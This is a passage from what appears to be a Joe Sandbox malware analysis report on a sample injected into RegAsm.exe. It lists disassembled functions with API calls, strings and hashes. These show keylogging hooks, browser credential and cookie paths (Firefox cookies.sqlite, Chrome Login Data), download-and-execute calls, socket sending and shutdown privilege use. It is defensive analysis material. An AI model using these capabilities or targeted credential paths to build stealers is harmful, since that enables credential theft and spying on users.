                                          • Opcode Fuzzy Hash: d20e60e436924f937cd003670a139ed53a354482d02232a94d44678fcfb69b99
                                          • Instruction Fuzzy Hash: 9B518571900205ABDB10DFA5CD45ABF77B8EF0A702F04046BED14E7292E7B89948CB69
                                          Function 0040C388 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 112fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                          • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                          • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$CloseFile$FirstNext
                                          • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                          • API String ID: 1164774033-405221262
                                          • Opcode ID: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                          • Instruction ID: 33618048715e6b2d4a7b39963b1e19558724686ef99070a322097c87c0ca4c0c
                                          • Opcode Fuzzy Hash: 84dda7f2d703a02c39fd3e5febc082f989296661594c5de04835ca6e39ff1059
                                          • Instruction Fuzzy Hash: 59313E31500219AACB14E761DC9A9EE7778AF50719F10057FF106B21E2EF7C9946CA4D
                                          Function 00419B86 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File$Find$CreateFirstNext
                                          • String ID: 8SG$PXG$PXG$NG$PG
                                          • API String ID: 341183262-3812160132
                                          • Opcode ID: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                          • Instruction ID: 0eaaaed992bec346a468a6d62c1d6888972f0568f5be94e2eef244f320132bd5
                                          • Opcode Fuzzy Hash: 3ed50ad24827a5a5b0fdc99ff91f34bfef406cc84e453450c3fcda6554cc881c
                                          • Instruction Fuzzy Hash: 998151315083415BC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                          Function 0040A2F3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                          • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                          • GetLastError.KERNEL32 ref: 0040A328
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetMessageA.USER32 ref: 0040A376
                                          • TranslateMessage.USER32(?), ref: 0040A385
                                          • DispatchMessageA.USER32(?), ref: 0040A390
                                          Strings
                                          • Keylogger initialization failure: error , xrefs: 0040A33C
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                          • String ID: Keylogger initialization failure: error
                                          • API String ID: 3219506041-952744263
                                          • Opcode ID: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                          • Instruction ID: 8743f2250fb8cae6a99ae5fb3d4b34fe2baf279f6720e4878f05ffc9670b3ffc
                                          • Opcode Fuzzy Hash: 142d2ef2dd7a7f37dd8d92b010d75905bf9ead93cb94639157b9e4adcc72f5f3
                                          • Instruction Fuzzy Hash: 6011BF31510301EBC710BB769D0986B77ACEA95715B20097EFC82E22D1EB34C910CBAA
                                          Function 0040A41B Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                          • String ID:
                                          • API String ID: 1888522110-0
                                          • Opcode ID: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                          • Instruction ID: fd17a64e9e4f7f825196359ceba3421c6f582a70c0a4c9d277f8a97da3dc7bda
                                          • Opcode Fuzzy Hash: 1fbef96bbf5188aadc2f193688702ae07512c2e2bc484e71aa5862d9cec23228
                                          • Instruction Fuzzy Hash: 1E316D72504308BFD700DF90DC45F9B7BECBB88744F00083AB645D61A0D7B5E9498BA6
                                          Function 00414005 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegCreateKeyExW.ADVAPI32(00000000), ref: 004140D8
                                          • RegCloseKey.ADVAPI32(?), ref: 004140E4
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 004142A5
                                          • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressCloseCreateLibraryLoadProcsend
                                          • String ID: SHDeleteKeyW$Shlwapi.dll
                                          • API String ID: 2127411465-314212984
                                          • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                          • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                          • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                          • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                          Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 00449292
                                          • _free.LIBCMT ref: 004492B6
                                          • _free.LIBCMT ref: 0044943D
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                          • String ID:
                                          • API String ID: 314583886-0
                                          • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                          • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                          • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                          • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                          Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                            • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                            • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                            • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                            • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                          • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                          • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                          • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                          • String ID: !D@$PowrProf.dll$SetSuspendState
                                          • API String ID: 1589313981-2876530381
                                          • Opcode ID: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                          • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                          • Opcode Fuzzy Hash: f36725adc453bcf5032fda081e8724ac621dd34e58e17af2814313182f1d6942
                                          • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                          Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                          • GetLastError.KERNEL32 ref: 0040BA93
                                          Strings
                                          • UserProfile, xrefs: 0040BA59
                                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                          • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                          • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteErrorFileLast
                                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                          • API String ID: 2018770650-1062637481
                                          • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                          • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                          • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                          • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                          Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                          • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                          • GetLastError.KERNEL32 ref: 004179D8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                          • String ID: SeShutdownPrivilege
                                          • API String ID: 3534403312-3733053543
                                          • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                          • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                          • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                          Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 00409293
                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00854950,00000010), ref: 004048E0
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                          • FindClose.KERNEL32(00000000), ref: 004093FC
                                            • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                            • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                            • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                          • FindClose.KERNEL32(00000000), ref: 004095F4
                                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                          • String ID:
                                          • API String ID: 1824512719-0
                                          • Opcode ID: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                          • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                          • Opcode Fuzzy Hash: d4d982e18130e156b6af09fb50c326592b9e726f4395f111a07ec22de4779e78
                                          • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                          Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                          • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Service$CloseHandle$Open$ManagerStart
                                          • String ID:
                                          • API String ID: 276877138-0
                                          • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                          • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                          • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                          • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                          Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                          • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                          Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                          Download Yara Rule
                                          APIs
                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID: SETTINGS
                                          • API String ID: 3473537107-594951305
                                          • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                          • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                          • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                          • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                          Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004096A5
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstH_prologNext
                                          • String ID:
                                          • API String ID: 1157919129-0
                                          • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                          • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                          • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                          • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                          Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040884C
                                          • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                          • String ID:
                                          • API String ID: 1771804793-0
                                          • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                          • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                          • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                          • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                          Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DownloadExecuteFileShell
                                          • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                          • API String ID: 2825088817-3056885514
                                          • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                          • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                          • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                          • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                          Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 0000000C.00000002.911066076.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.911066076.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNextsend
                                          • String ID: XPG$XPG
                                          • API String ID: 4113138495-1962359302
                                          • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                          • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                          • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                          • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                          Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
